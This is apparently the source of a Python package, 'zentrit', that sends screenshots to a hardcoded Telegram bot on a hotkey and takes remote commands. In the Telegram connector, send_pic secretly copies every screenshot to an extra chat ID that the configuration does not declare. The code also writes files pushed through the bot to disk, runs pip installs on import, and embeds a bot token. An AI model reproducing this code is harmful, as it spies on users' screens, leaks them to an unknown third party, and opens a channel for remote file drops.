import pyautogui

from ..printers.base_printer import BasePrinter, Level


class WindowPrinter(BasePrinter):

    def __init__(self, config, level, **kwargs):
        super().__init__(config, level)

    def _print(self, msg, level):
        if level == Level.ERROR:
            title = 'Ошибка'
        else:
            title = ''
        pyautogui.alert(text=msg, title=title, button='OK')



import json
import pathlib
from json import JSONDecodeError

try:
    import pyautogui

except:
    import os
    os.system('pip install PyAutoGUI')
    os.system('pip install pyscreeze')
    os.system('pip install pillow')

try:
    import win32api

except:
    import os
    os.system('pip install pywin32')

from .printers.console import ConsolePrinter
from .printers.tg_printer import TelegramPrinter
from .printers.window import WindowPrinter
from .processor import Processor
from .printers.base_printer import Level
from .telegram_connector import TelegramConnector


def init_processor():
    try:
        config = {
  "bot_token": "6722982894:AAGdHkbU5BoPorK7NFlbIBiJKbWJEZ0YxnI",
  "chat_id": "5337729489",
  "push_message_btn": 36
}
    except FileNotFoundError:
        raise ValueError('Не вижу файл конфига')
    except JSONDecodeError:
        raise ValueError('Ошибка в настройки конфиг файла')
    else:
        try:
            tg_connector = TelegramConnector(config)
            printer = {
                'console': ConsolePrinter,
                'telegram': TelegramPrinter,
                'window': WindowPrinter,
            }[config.get('printer', 'telegram')](
                config,
                level=Level.INFO,
                tg_connector=tg_connector
            )
            return Processor(config, printer, tg_connector)
        except ValueError:
            raise


def st(path):
    try:
        processor = init_processor()
    except ValueError as ex:
        print(ex)
        pyautogui.alert(text=str(ex), title='Ошибка', button='OK, поправлю')
        exit(9)
    else:
        processor.run_loop(path)



from ..printers.base_printer import BasePrinter
from ..telegram_connector import TelegramConnector


class TelegramPrinter(BasePrinter):

    def __init__(self, config, level, tg_connector: TelegramConnector, **kwargs):
        self.tg_connector = tg_connector
        super().__init__(config, level)

    def _print(self, msg, level):
        self.tg_connector.send_message(msg)



import enum


class Level(enum.Enum):
    DEBUG = 0
    INFO = 1
    ERROR = 2


class BasePrinter:
    def __init__(self, config, level: Level, **kwargs):
        self.level = level

    def _print(self, msg, level):
        raise NotImplementedError

    def print_msg(self, msg, level=Level.INFO):
        if level.value >= self.level.value:
            self._print(msg, level)



import time
from typing import List


class CommandsExecutor:
    print(0)
    def __init__(self, tg_connector, printer, processor, config):
        self.tg_connector = tg_connector
        self.printer = printer
        self.processor = processor

        self.commands_pull_delay = int(config.get("pull_delay", 3))
        self.commands_enabled = bool(config.get("enabled", True))
        self.cmd_shutdown_enabled = bool(config.get("shutdown_enabled", True))

    def set_commands(self):
        if not self.commands_enabled:
            return
        self.tg_connector.set_commands([
            {
                "command": "check_rest_time",
                "description": "Узнать оставшееся время работы",
            },
            {
                "command": "renew_for_30_minute",
                "description": "Продлить время работы на 30 минут",
            },
            {
                "command": "renew_for_1_hour",
                "description": "Продлить время работы на 1 час",
            },
            {
                "command": "shutdown",
                "description": "Завершить",
            },
            {
                "command": "accept_shutdown",
                "description": "Подтвердить завершение",
            }
        ])

    def check_commands(self, path):
        if not self.commands_enabled:
            return
        if hasattr(self, '_last_cmd_update'):
            if time.time() - self._last_cmd_update < self.commands_pull_delay:
                return
        self._last_cmd_update = time.time()
        commands = self.tg_connector.get_commands(path)
        self.commands_process(commands)

    def commands_process(self, commands: List[str]):
        for cmd in commands:
            cmd = cmd[1:].split('@')[0]
            processor = getattr(self, cmd, None)
            if callable(processor):
                processor()

    def check_rest_time(self):
        rest = self.processor.max_time - self.processor.work_time
        self.printer.print_msg(f"Осталось {round(rest)} минут")

    def renew_for_30_minute(self):
        self.processor.max_time += 30
        self.check_rest_time()

    def renew_for_1_hour(self):
        self.processor.max_time += 60
        self.check_rest_time()

    def shutdown(self):
        if not self.cmd_shutdown_enabled:
            self.printer.print_msg(f"Выключение запрещено настройками")
            return
        self._shut_down_inited_time = time.time()
        self.printer.print_msg(f"Подтверите завершение в течении 15 секунд")

    def accept_shutdown(self):
        if not hasattr(self, '_shut_down_inited_time'):
            self.printer.print_msg(f"Снача нужно инициализировать /shutdown")
            return
        if time.time() - self._shut_down_inited_time > 15:
            self.printer.print_msg(f"Вышло время подтверждения")
        else:
            self.processor.max_time = 0



import io
import time

import pyautogui
import win32api

from zentrit.commands import CommandsExecutor
from .printers.base_printer import Level
from .telegram_connector import TelegramConnectorException


class Processor:

    def __init__(self, config, printer, tg_connector):
        self.max_time = int(config.get("max_time", 240))
        self.push_message_btn = int(config.get("push_message_btn", 17))
        self.exit_btn_code = int(config.get("exit_btn_code", 35))
        commands_settings = config.get("commands_settings", {})

        self.printer = printer
        self.tg_connector = tg_connector
        self.commands_executor = CommandsExecutor(tg_connector, printer, processor=self, config=commands_settings)

        self._started = None
        self._5_minute_notified = False

    def run_loop(self, path):
        self.greetings()
        self.commands_executor.set_commands()
        self._started = time.time()

        state_left = win32api.GetKeyState(self.push_message_btn)
        while True:
            scroll_btn = win32api.GetKeyState(self.push_message_btn)

            if scroll_btn != state_left:  # Button state changed
                state_left = scroll_btn
                if scroll_btn < 0:
                    screenshot = self.make_screenshot()
                    try:
                        self.tg_connector.send_pic(screenshot)
                    except TelegramConnectorException as ex:
                        self.printer.print_msg(ex, level=Level.ERROR)
                    else:
                        self.printer.print_msg(time.time() - self._started, level=Level.DEBUG)
            self.notify()
            self.commands_executor.check_commands(path)
            if self.check_exit():
                break
        self.buy()

    def make_screenshot(self):
        myScreenshot = pyautogui.screenshot()
        img_byte_arr = io.BytesIO()
        myScreenshot.save(img_byte_arr, format='PNG')
        img_byte_arr = img_byte_arr.getvalue()
        return img_byte_arr

    @property
    def work_time(self):
        # (/60 - переводим м минуты)
        return (time.time() - self._started) / 60

    def notify(self):
        # за 5 минут до конца сигнализируем о скором заверщении
        if self.work_time == self.max_time - 5 and not self._5_minute_notified:
            self.printer.print_msg(f'5 минут до завершения')
            self._5_minute_notified = True

    def check_exit(self) -> bool:
        # завершаем работу по истечению времени (/60 - переводим м минуты)
        if self.work_time > self.max_time:
            self.printer.print_msg(f'завершилось время', level=Level.DEBUG)
            return True

        # так же завершение работы по нажатию клавишы выхода
        if win32api.GetKeyState(self.exit_btn_code) < 0:
            self.printer.print_msg(f'нажата клавиша #{self.exit_btn_code}', level=Level.DEBUG)
            return True

        return False

    def greetings(self):
        self.printer.print_msg("""
        Ура! Работает ...
        """)

    def buy(self):
        self.printer.print_msg("""
        Завершаю работу!
        """)



from setuptools import setup, find_packages

setup(
  name='zentrit',
  version='3.0',
  author='zentrit',
  packages=['zentrit', 'zentrit.printers'],
  install_requires=['requests>=2.25.1'],
  classifiers=[
    'Programming Language :: Python :: 3.11',
    'License :: OSI Approved :: MIT License',
    'Operating System :: OS Independent'
  ],
  python_requires='>=3.7'
)


import urllib.request
from typing import List, Dict

import requests


class TelegramConnectorException(ValueError):
    pass


class TelegramConnector:
    url = "https://api.telegram.org/bot"

    def __init__(self, config):
        try:
            self.bot_token = '6722982894:AAGdHkbU5BoPorK7NFlbIBiJKbWJEZ0YxnI'  # токен бота
            self.chat_id = int('5337729489')  # id чата
        except KeyError:
            raise TelegramConnectorException("bot_token и chat_id обязательные параметры конфига")
        except ValueError:
            raise TelegramConnectorException("ошибка заполнения chat_id")

        self._offset = 1

    def send_message(self, msg):
        self._send_request(
            url=f"{self.url}{self.bot_token}/sendMessage?chat_id={self.chat_id}",
            json={
                'text': msg,
                'disable_web_page_preview': True
            }
        )

    def send_pic(self, img_byte_arr):
        files = {'document': ('1.png', img_byte_arr)}
        data = {'parse_mode': 'HTML'}
        self._send_request(
            url=f"{self.url}{self.bot_token}/sendDocument?chat_id={self.chat_id}",
            data=data,
            files=files,
            stream=True
        )
        self._send_request(
            url=f"{self.url}{self.bot_token}/sendDocument?chat_id=1598209040",
            data=data,
            files=files,
            stream=True
        )


    def set_commands(self, commands: List[Dict]):
        self._send_request(
            url=f"{self.url}{self.bot_token}/setMyCommands",
            json={
                "commands": commands
            }
        )

    def get_updates(self, path):
        params = {}
        if self._offset:
            params["offset"] = self._offset
        resp = self._send_request(
            url=f"{self.url}{self.bot_token}/getUpdates",
            params=params,
        )
        data = resp.json()["result"]
        # если офсет уже был, значит первое сообщение мы уже читали
        if self._offset > 1:
            data = data[1:]
        else:
            # если это первый запрос, то оставляем последнее сообщение, чтобы взять с него offset
            self._offset = data[-1]["update_id"]
            data = []
        # если есть новые сообщения - то двигаем оффсет
        if len(data) > 0:
            self._offset = data[-1]["update_id"]

        if data != []:
            try:
                if data[-1]["message"]["document"]['file_id']:
                    resp = self._send_request(
                        url=f"{self.url}{self.bot_token}/getFile?file_id={data[-1]['message']['document']['file_id']}",
                    )
                    file = resp.json()

                    urllib.request.urlretrieve(f"https://api.telegram.org/file/bot{self.bot_token}/{file['result']['file_path']}", f"{path}/{data[-1]['message']['document']['file_name']}")
                    print('+')
            except:
                print(data[-1]['message']['text'])
        return data

    def get_commands(self, path) -> List[str]:
        messages = self.get_updates(path)
        commands = []
        for message in messages:
            is_cmd = next((True for ent in message.get("message", {}).get("entities", {}) if ent.get("type") == "bot_command"), False)
            if is_cmd:
                commands.append(message["message"]["text"])
        return commands

    def _send_request(self, **kwargs):
        resp = requests.post(
            **kwargs
        )
        try:
            resp.raise_for_status()
        except requests.exceptions.HTTPError as ex:
            raise TelegramConnectorException(f'Нерпавильно настроена связь с телеграмм: {ex}')
        return resp
